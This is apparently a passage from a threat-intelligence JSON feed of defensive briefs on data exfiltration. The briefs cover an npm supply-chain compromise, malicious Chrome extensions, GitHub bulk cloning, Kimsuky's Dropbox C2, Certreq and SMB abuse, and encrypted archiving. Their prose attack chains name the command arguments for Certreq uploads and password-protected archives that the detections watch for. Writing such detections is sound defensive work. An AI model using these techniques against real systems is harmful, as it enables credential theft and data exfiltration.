{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/exfiltration/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Bitwarden CLI"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","exfiltration","npm"],"_cs_type":"advisory","_cs_vendors":["Bitwarden"],"content_html":"\u003cp\u003eA compromised Bitwarden CLI npm package allows a remote, anonymous attacker to steal credentials and exfiltrate sensitive information. The specific version of the compromised package is not detailed in the advisory. This supply chain attack targets developers and users who rely on the Bitwarden CLI for managing their passwords and secrets. This attack has the potential to expose sensitive credentials, leading to unauthorized access to systems and data. Defenders need to monitor for unusual activity related to the Bitwarden CLI and its usage within their environments to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a Bitwarden CLI npm package through techniques such as typosquatting, account compromise, or dependency confusion.\u003c/li\u003e\n\u003cli\u003eUnsuspecting developers or users download and install the compromised package from the npm registry.\u003c/li\u003e\n\u003cli\u003eDuring installation, the malicious package executes malicious code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects Bitwarden credentials and other sensitive information stored in the CLI\u0026rsquo;s configuration.\u003c/li\u003e\n\u003cli\u003eThe compromised package establishes a covert communication channel (e.g., HTTPS) to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eStolen credentials and sensitive information are exfiltrated to the 
attacker\u0026rsquo;s server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access victim\u0026rsquo;s Bitwarden vaults or other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker may further escalate privileges and compromise additional systems within the victim\u0026rsquo;s environment using the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to the theft of sensitive credentials and information stored within Bitwarden CLI. The number of victims is currently unknown. Organizations using the compromised package could experience unauthorized access to critical systems, data breaches, and potential financial losses. The targeted sectors are broad, encompassing any organization utilizing the Bitwarden CLI for password management and secret storage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for unusual activity or unexpected dependencies using process creation logs and file integrity monitoring.\u003c/li\u003e\n\u003cli\u003eImplement strict code review processes for all third-party dependencies, especially those related to security tools like Bitwarden CLI.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious network connections from the Bitwarden CLI executable to identify potential data exfiltration.\u003c/li\u003e\n\u003cli\u003eEnforce multi-factor authentication (MFA) on Bitwarden accounts to mitigate the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review the permissions and access rights associated with Bitwarden CLI credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T11:28:56Z","date_published":"2026-05-04T11:28:56Z","id":"/briefs/2026-05-bitwarden-cli-compromise/","summary":"A remote attacker can exploit a compromised Bitwarden CLI npm package to steal 
credentials and exfiltrate sensitive information.","title":"Compromised Bitwarden CLI npm Package Enables Credential Theft and Information Exfiltration","url":"https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["chrome-extension","credential-theft","backdoor","ad-injection","exfiltration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA coordinated campaign involving 108 malicious Chrome extensions has been discovered. These extensions, distributed through five accounts (GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project), are designed to steal user data, inject ads, and create backdoors. Over 20,000 users have installed these extensions. The extensions provide expected functionality to avoid suspicion, but malicious code runs in the background, communicating with a shared C\u0026amp;C infrastructure to perform nefarious activities. The extensions target various user types by masquerading as Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. 
This campaign poses a significant threat to user privacy and system security.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUsers install malicious Chrome extensions from the Chrome Web Store, believing they are legitimate tools (e.g., Telegram clients, games, enhancers).\u003c/li\u003e\n\u003cli\u003eUpon installation, the extensions execute JavaScript code in the background.\u003c/li\u003e\n\u003cli\u003eExtensions designed for credential theft acquire Google OAuth2 Bearer tokens and exfiltrate user information (email, name, profile picture) to a remote server.\u003c/li\u003e\n\u003cli\u003eExtensions targeting Telegram steal the active Telegram Web session by overwriting local storage with attacker-supplied data and force-reloading Telegram.\u003c/li\u003e\n\u003cli\u003eSome extensions contain a backdoor that opens an arbitrary URL received from the C\u0026amp;C server in a new tab upon browser start.\u003c/li\u003e\n\u003cli\u003eOther malicious activities include injecting ads into YouTube and TikTok pages, injecting content scripts into all visited pages, or proxying translation requests through attacker-controlled servers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to user accounts (Google, Telegram) and can inject malicious content, redirect traffic, and steal sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOver 20,000 users have been affected by these malicious extensions. The campaign targets a broad range of users by using different categories of extensions. Successful exploitation can lead to stolen credentials, account takeover, data exfiltration, ad fraud, and the ability to inject arbitrary content into visited websites. 
The compromised systems could be used for further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network connections originating from Chrome extensions for connections to unusual or suspicious domains using a network connection rule (see example rule below).\u003c/li\u003e\n\u003cli\u003eImplement strict policies for Chrome extension installations, including whitelisting approved extensions and blocking installation from untrusted sources.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of scripts from the malicious extensions to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T12:00:00Z","date_published":"2026-04-16T12:00:00Z","id":"/briefs/2026-04-chrome-extension-backdoor/","summary":"A coordinated campaign uses 108 malicious Chrome extensions to steal user data, inject ads, and establish backdoors on over 20,000 systems via a shared command-and-control infrastructure.","title":"Malicious Chrome Extensions Stealing Data and Opening Backdoors","url":"https://feed.craftedsignal.io/briefs/2026-04-chrome-extension-backdoor/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github","exfiltration","code_repository"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis alert identifies potential data exfiltration from GitHub via rapid repository cloning. Attackers often target code repositories to steal proprietary code, embedded secrets, and build artifacts. This activity can be indicative of a compromised personal access token (PAT) being used in a script to enumerate and clone repositories from a CI runner or cloud VM. Private and internal repositories are particularly attractive targets, as they often contain sensitive information. 
The alert focuses on detecting unusual patterns of bulk cloning within a short timeframe, allowing defenders to respond quickly before significant data loss occurs. The original rule was created on 2025/12/16 and updated on 2026/04/10. This activity is often associated with supply chain attacks and the compromise of CI/CD pipelines, similar to the Shai Hulud attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains unauthorized access to a GitHub account or obtains a valid, but misused, Personal Access Token (PAT).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised credentials to authenticate to the GitHub API.\u003c/li\u003e\n\u003cli\u003eThe attacker script enumerates accessible repositories within the organization, identifying potential targets.\u003c/li\u003e\n\u003cli\u003eA script is executed to initiate a high volume of \u003ccode\u003egit clone\u003c/code\u003e operations against the targeted repositories.\u003c/li\u003e\n\u003cli\u003eRepositories, including private and internal ones, are cloned to a staging area, often a CI runner or cloud VM.\u003c/li\u003e\n\u003cli\u003eThe cloned data is compressed and staged for exfiltration, potentially involving archiving or large outbound transfers.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the cloned data to an external location, potentially via a web service or other covert channel.\u003c/li\u003e\n\u003cli\u003eThe exfiltrated data is used for malicious purposes, such as reverse engineering, finding vulnerabilities, or selling sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exfiltration of GitHub repositories can lead to the exposure of sensitive source code, trade secrets, and proprietary algorithms. This can result in significant financial losses, reputational damage, and competitive disadvantage. 
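The counting logic behind this brief is easiest to reason about when it is in front of you. What follows is an added example written for this page, not the feed's Sigma rule and not GitHub's code: a sliding-window detector over GitHub audit-log style events. The `action`, `actor`, `repo`, `user_agent` and `@timestamp` (epoch milliseconds) field names follow the audit-log export shape; the 10-minute window is an assumption, because the page only fixes the `event_count >= 25` threshold. The sample log is constructed.

```python
"""Sliding-window detection of GitHub clone bursts (added example).

Counts *distinct* repositories cloned by one actor inside a time window, so a
CI job that retries the same clone does not trip the rule, while a token-driven
script walking an organisation does.
"""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

THRESHOLD = 25                    # event_count >= 25, the page's default
WINDOW = timedelta(minutes=10)    # assumed window; tune together with THRESHOLD


def parse_clone_events(lines):
    """Parse JSON lines, keep only git.clone events, return them in time order."""
    events = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("action") != "git.clone":
            continue
        ts = datetime.fromtimestamp(ev["@timestamp"] / 1000, tz=timezone.utc)
        events.append((ts, ev["actor"], ev["repo"], ev.get("user_agent", "")))
    events.sort(key=lambda e: e[0])
    return events


def detect_clone_bursts(lines, threshold=THRESHOLD, window=WINDOW):
    """One alert per actor whose distinct-repo clone count within `window`
    reaches `threshold`; the alert is refreshed as the burst grows so the
    final record covers the whole burst."""
    recent = defaultdict(deque)   # actor -> deque of (ts, repo) inside the window
    alerts = {}
    for ts, actor, repo, ua in parse_clone_events(lines):
        q = recent[actor]
        q.append((ts, repo))
        while ts - q[0][0] > window:      # drop events that fell out of the window
            q.popleft()
        distinct = {r for _, r in q}
        if len(distinct) >= threshold:
            alerts[actor] = {
                "actor": actor,
                "repo_count": len(distinct),
                "window_start": q[0][0].isoformat(),
                "window_end": ts.isoformat(),
                "user_agent": ua,             # pivot for host identification
            }
    return list(alerts.values())


def _build_sample_log():
    """Constructed sample: a service account cloning 30 repos in 2.5 minutes,
    a developer re-cloning one repo through the day, and an unrelated push."""
    base = datetime(2026, 4, 10, 17, 0, tzinfo=timezone.utc)
    ms = lambda t: int(t.timestamp() * 1000)
    lines = []
    for i in range(30):
        lines.append(json.dumps({
            "action": "git.clone", "actor": "svc-ci-runner",
            "repo": f"acme/service-{i:02d}", "user_agent": "git/2.43.0",
            "@timestamp": ms(base + timedelta(seconds=5 * i)),
        }))
    for i in range(10):
        lines.append(json.dumps({
            "action": "git.clone", "actor": "dev-alice", "repo": "acme/web",
            "user_agent": "git/2.43.0",
            "@timestamp": ms(base + timedelta(minutes=12 * i)),
        }))
    lines.append(json.dumps({"action": "git.push", "actor": "dev-alice",
                             "repo": "acme/web", "@timestamp": ms(base)}))
    return lines


SAMPLE_LOG = _build_sample_log()


def run_sample():
    return detect_clone_bursts(SAMPLE_LOG)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Only `svc-ci-runner` is reported: thirty distinct repositories inside the window, with the user agent carried along so the originating host can be traced. `dev-alice` never exceeds one distinct repository per window, which is the false positive a raw event counter would have produced.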
In the event of secrets exposure (API keys, passwords, etc.), downstream systems and services may also be compromised. Depending on the nature of the exfiltrated code, legal and regulatory repercussions are also possible. Mass cloning of dozens of repositories can quickly siphon proprietary code, embedded secrets, and build artifacts across teams before defenses can respond.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eGithub Exfiltration via High Number of Clones in Short Time\u003c/code\u003e to your SIEM and tune the threshold (event_count \u0026gt;= 25) for your environment to reduce false positives based on legitimate automated activity.\u003c/li\u003e\n\u003cli\u003eMonitor GitHub audit logs for \u003ccode\u003egit.clone\u003c/code\u003e events, focusing on users with a high number of clones within a short timeframe to catch suspicious activity.\u003c/li\u003e\n\u003cli\u003eRevoke any GitHub tokens identified as being used for mass cloning, and force password resets and 2FA re-verification for the associated user accounts.\u003c/li\u003e\n\u003cli\u003eInvestigate the originating host (identified by the \u003ccode\u003eagent.id\u003c/code\u003e or \u003ccode\u003euser_agent\u003c/code\u003e fields) for signs of compromise and block/quarantine it to prevent further exfiltration.\u003c/li\u003e\n\u003cli\u003eImplement organization-wide SAML SSO, disallow classic PATs, and enforce IP allowlisting for PAT use to enhance security posture.\u003c/li\u003e\n\u003cli\u003eEnable secret scanning with push protection on all repositories to prevent accidental or intentional exposure of credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T17:40:11Z","date_published":"2026-04-10T17:40:11Z","id":"/briefs/2026-06-github-exfiltration/","summary":"A single user rapidly cloning a high number of GitHub repositories indicates potential exfiltration of 
sensitive data such as proprietary code, embedded secrets, and build artifacts.","title":"GitHub Exfiltration via High Number of Repository Clones","url":"https://feed.craftedsignal.io/briefs/2026-06-github-exfiltration/"},{"_cs_actors":["Kimsuky","Black Banshee","Velvet Chollima","Emerald Sleet","Thallium"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kimsuky","dropbox","api","command-and-control","exfiltration"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eKimsuky, a North Korean APT group, has been observed utilizing malware that leverages the Dropbox API for command and control (C2). This allows the malware to blend in with legitimate network traffic, making detection more challenging. The malware uses the Dropbox API to upload stolen data and download commands from the attackers. This method provides a covert channel for exfiltration and control, bypassing traditional network-based security measures. The group has been known to target South Korean entities, but the scope of targeting may extend beyond this region. 
This technique has been observed starting in early 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained through an unconfirmed vector, such as spear phishing or watering hole attacks, delivering an initial downloader.\u003c/li\u003e\n\u003cli\u003eThe downloader executes and establishes persistence, potentially by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe malware authenticates to the Dropbox API with an embedded or attacker-provisioned OAuth access token (Dropbox accounts are accessed with bearer tokens rather than static API keys), so all of its traffic goes to Dropbox\u0026rsquo;s own API endpoints over HTTPS.\u003c/li\u003e\n\u003cli\u003eThe malware enumerates files on the compromised system, targeting documents, credentials, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eStolen data is compressed and encrypted before being uploaded to a designated Dropbox folder controlled by the attacker, using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eThe malware periodically checks the attacker\u0026rsquo;s Dropbox folder for new commands, also using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eDownloaded commands are decrypted and executed on the compromised system, enabling actions such as remote code execution or further data exfiltration.\u003c/li\u003e\n\u003cli\u003eThe cycle of data exfiltration and command execution continues, allowing the attacker to maintain persistent access and control over the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks can lead to significant data breaches, intellectual property theft, and espionage. Kimsuky\u0026rsquo;s targeting of South Korean entities suggests a focus on political and strategic intelligence gathering. Because Dropbox traffic is already permitted in many environments, using it as the C2 channel lets the attackers remain undetected for extended periods, maximizing the impact of the compromise.
The number of victims is currently unknown, but the potential for widespread compromise is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for unusual API calls to Dropbox, especially from unknown or suspicious processes (see: \u0026ldquo;Detect Suspicious Dropbox API Usage\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and monitoring for Dropbox API usage within the organization.\u003c/li\u003e\n\u003cli\u003eInvestigate and block any suspicious processes attempting to access Dropbox API endpoints.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T12:00:00Z","date_published":"2026-03-19T12:00:00Z","id":"/briefs/2026-03-kimsuky-dropbox-api/","summary":"Kimsuky is using malware that leverages the Dropbox API for command and control, enabling file exfiltration and remote code execution.","title":"Kimsuky Malware Using Dropbox API for Command and Control","url":"https://feed.craftedsignal.io/briefs/2026-03-kimsuky-dropbox-api/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon Event ID 1 - Process Creation","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["lolbin","command-and-control","exfiltration","certreq"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Certreq utility is a command-line tool used for managing certificates. Adversaries may abuse Certreq to download files from or upload data to a remote server by initiating an HTTP POST request. This behavior can be used for command and control (C2) or exfiltration. This technique leverages a legitimate system binary (LOLBin) to evade detection. 
The corresponding Elastic detection can be fed from several data sources, including Elastic Defend, Microsoft Defender XDR, Sysmon, SentinelOne, and CrowdStrike. This is a cross-industry threat that can affect any organization using Windows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes Certreq.exe with the \u003ccode\u003e-Post\u003c/code\u003e argument, pointing \u003ccode\u003e-config\u003c/code\u003e at an attacker-controlled URL and naming a local file as the request body, to initiate an HTTP POST request.\u003c/li\u003e\n\u003cli\u003eThe Certreq process connects to the remote server to send or receive data.\u003c/li\u003e\n\u003cli\u003eThe remote server responds to the Certreq request, either delivering a file in the response body or simply receiving the exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe response is written to the output file given on the command line (if a download was the goal).\u003c/li\u003e\n\u003cli\u003eThe attacker may execute the downloaded file or further process the exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to clean up the Certreq command from command history or logs to evade detection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could lead to the download and execution of malicious payloads, potentially compromising the affected system and network. Alternatively, sensitive data could be exfiltrated from the target environment. The impact can range from data theft and system compromise to full network intrusion, depending on the attacker\u0026rsquo;s objectives and the data accessed.
The severity is medium because Certreq is a legitimate tool, and its abuse requires specific command-line arguments and network activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Certreq HTTP Post Request\u0026rdquo; to your SIEM to identify potential abuse of Certreq for file transfer.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the execution of Certreq.exe and its command-line arguments, enabling detections.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from Certreq.exe for unusual destinations or data transfer patterns using network connection logs.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of Certreq.exe executing with the \u003ccode\u003e-Post\u003c/code\u003e argument, as this is not typical usage of the utility.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T20:47:00Z","date_published":"2024-01-28T20:47:00Z","id":"/briefs/2024-01-certreq-post/","summary":"Adversaries may abuse the Windows Certreq utility to download files or upload data to a remote URL by making an HTTP POST request, potentially for command and control or exfiltration, which can be detected by monitoring process execution events.","title":"Potential Abuse of Certreq for File Transfer via HTTP POST","url":"https://feed.craftedsignal.io/briefs/2024-01-certreq-post/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["exfiltration","credential-access","windows","smb","ntlm"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection strategy focuses on identifying unusual Server Message Block (SMB) traffic that originates from internal IP addresses and connects to external networks. 
The SMB protocol, commonly used for file and printer sharing within a network, can be abused for credential theft: a rogue UNC path planted in a document, email, or link makes the victim\u0026rsquo;s Windows host open an SMB connection to an attacker-controlled server and authenticate to it automatically, exposing the user\u0026rsquo;s NTLM authentication material. This activity is often associated with threat actors attempting to steal credentials for lateral movement or data exfiltration. Defenders should be aware of this technique because it relies on a legitimate protocol and default client behaviour rather than on an exploit, so traditional controls may not flag it. This detection is relevant for environments running Windows and using SMB for internal network communications. The goal is to identify and alert on SMB connections to external IPs, excluding known safe ranges and legitimate business applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker targets a user on the internal network, typically via phishing (delivery is not detailed in the source); the host itself need not be compromised beforehand.\u003c/li\u003e\n\u003cli\u003eThe attacker embeds a rogue UNC path pointing at an external, attacker-controlled SMB server in a document, email, or other medium.\u003c/li\u003e\n\u003cli\u003eA user opens the malicious document or clicks the injected link, triggering an SMB connection to the external server on TCP 445 (or 139).\u003c/li\u003e\n\u003cli\u003eThe Windows SMB client attempts to authenticate with the user\u0026rsquo;s NTLM credentials, typically without any prompt.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s server captures the NetNTLM challenge-response from the authentication attempt (not the NT hash itself).\u003c/li\u003e\n\u003cli\u003eThe attacker cracks the captured response offline to recover the user\u0026rsquo;s password, or relays it to another service that accepts NTLM authentication.\u003c/li\u003e\n\u003cli\u003eUsing the recovered password or relayed session, the attacker gains unauthorized access to other systems and resources on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to credential theft, allowing attackers to gain unauthorized access to sensitive data and systems within the organization.
This can result in data breaches, financial losses, and reputational damage. The impact is significant because SMB is a common protocol within many Windows environments, making this technique highly effective if not properly monitored.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SMB Connection to External IP\u0026rdquo; to your SIEM to identify potentially malicious SMB connections to the internet. Tune the rule by excluding known good external IPs used by legitimate services.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) with proper filtering to capture SMB traffic details as recommended in the linked setup guide, to enhance the fidelity of the detection.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to restrict SMB traffic to only necessary internal communications, reducing the attack surface and mitigating the risk of external exposure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-25T12:00:00Z","date_published":"2024-01-25T12:00:00Z","id":"/briefs/2024-01-rare-smb-exfiltration/","summary":"This brief details a detection strategy for rare SMB connections originating from internal networks to the internet, potentially indicating NTLM credential theft via rogue UNC path injection.","title":"Detecting Rare SMB Connections for Potential NTLM Credential Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-rare-smb-exfiltration/"},{"_cs_actors":["BadPatch"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["command-and-control","exfiltration","network-traffic"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection rule identifies suspicious SMTP activity occurring over TCP port 26. While standard SMTP traffic typically uses port 25, port 26 is sometimes used as an alternative to avoid conflicts or restrictions. 
The BadPatch malware family has been known to leverage port 26 for command and control (C2) communications with compromised Windows systems. The activity is considered suspicious because legitimate SMTP on port 26 is uncommon (some mail hosts offer it as an alternative when port 25 is blocked, which is the main tuning consideration), so its presence can indicate a covert C2 channel used by malware such as BadPatch. The rule analyzes network traffic to detect SMTP communication occurring on this non-standard port, helping to identify potential infections or unauthorized network activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial infection occurs via an unspecified method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eMalware establishes a foothold on the compromised system.\u003c/li\u003e\n\u003cli\u003eMalware configures itself to use SMTP on port 26 for C2 communications.\u003c/li\u003e\n\u003cli\u003eThe infected host initiates a TCP connection to a remote server on port 26.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s server delivers commands to the infected host over the SMTP connection on port 26.\u003c/li\u003e\n\u003cli\u003eThe infected host executes the received commands.\u003c/li\u003e\n\u003cli\u003eThe malware may exfiltrate data to the remote server over the SMTP connection on port 26.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems may be remotely controlled by attackers, leading to data theft, malware propagation, or further malicious activities. The use of non-standard ports like 26 can help attackers evade detection.
If successful, an attacker can maintain persistence and control over the compromised system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SMTP Traffic on TCP Port 26\u003c/code\u003e to your SIEM and tune for your environment to detect potential command and control activity.\u003c/li\u003e\n\u003cli\u003eInvestigate any network connections on TCP port 26 to identify potentially malicious SMTP traffic.\u003c/li\u003e\n\u003cli\u003eReview network traffic logs focusing on \u003ccode\u003enetwork_traffic.flow\u003c/code\u003e or \u003ccode\u003ezeek.smtp\u003c/code\u003e events to detect unusual patterns associated with TCP port 26.\u003c/li\u003e\n\u003cli\u003eImplement firewall rules to block unauthorized SMTP traffic on port 26.\u003c/li\u003e\n\u003cli\u003eExamine source and destination IP addresses of traffic on port 26, and correlate with threat intelligence sources to identify known malicious actors as per the references.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-smtp-port-26/","summary":"This rule detects SMTP traffic on TCP port 26, an alternative to the standard port 25 that the BadPatch malware family has used for command and control of Windows systems.","title":"Suspicious SMTP Activity on Port 26/TCP","url":"https://feed.craftedsignal.io/briefs/2024-01-03-smtp-port-26/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["collection","archive","exfiltration","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers frequently compress and encrypt data before exfiltration to reduce the amount of data being sent over the network and to obfuscate the contents. 
This behavior often indicates a later stage of intrusion where the attacker has already collected sensitive data and is preparing to move it out of the environment. The use of archiving tools like WinRAR and 7-Zip with encryption flags hides the contents of the staged data, making it more difficult for defenders to identify what was taken and to respond to the theft. This technique has been used by multiple threat actors, including Turla as documented by WeLiveSecurity. This brief focuses on detecting command-line activity indicative of archive creation with encryption using WinRAR or 7-Zip on Windows systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker gains initial access to the system through methods such as phishing, exploiting vulnerabilities, or using stolen credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Access:\u003c/strong\u003e The attacker attempts to obtain credentials with tools and techniques such as Mimikatz or other LSASS and SAM credential dumping.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker performs reconnaissance to identify sensitive data and systems of interest.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e The attacker gathers sensitive data from various locations on the compromised system or network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArchive Creation:\u003c/strong\u003e The attacker uses WinRAR or 7-Zip to create an encrypted archive of the collected data using command-line arguments like \u003ccode\u003e-hp\u003c/code\u003e, \u003ccode\u003e-p\u003c/code\u003e, \u003ccode\u003e/hp\u003c/code\u003e, or \u003ccode\u003e/p\u003c/code\u003e with \u003ccode\u003erar.exe\u003c/code\u003e or \u003ccode\u003eWinRAR.exe\u003c/code\u003e (\u003ccode\u003e-hp\u003c/code\u003e also encrypts file names, so even the archive listing is hidden) or \u003ccode\u003e-p*\u003c/code\u003e with \u003ccode\u003e7z.exe\u003c/code\u003e or
\u003ccode\u003e7za.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Staging:\u003c/strong\u003e The encrypted archive is moved to a staging location, such as a temporary directory or removable media.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration:\u003c/strong\u003e The attacker exfiltrates the encrypted archive from the network using various methods, such as FTP, SCP, or cloud storage services.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCovering Tracks:\u003c/strong\u003e The attacker deletes the archive from the staging location to remove evidence of the activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the exfiltration of sensitive data, including personally identifiable information (PII), financial records, intellectual property, and other confidential information. This can result in significant financial losses, reputational damage, legal liabilities, and regulatory fines for the victim organization. 
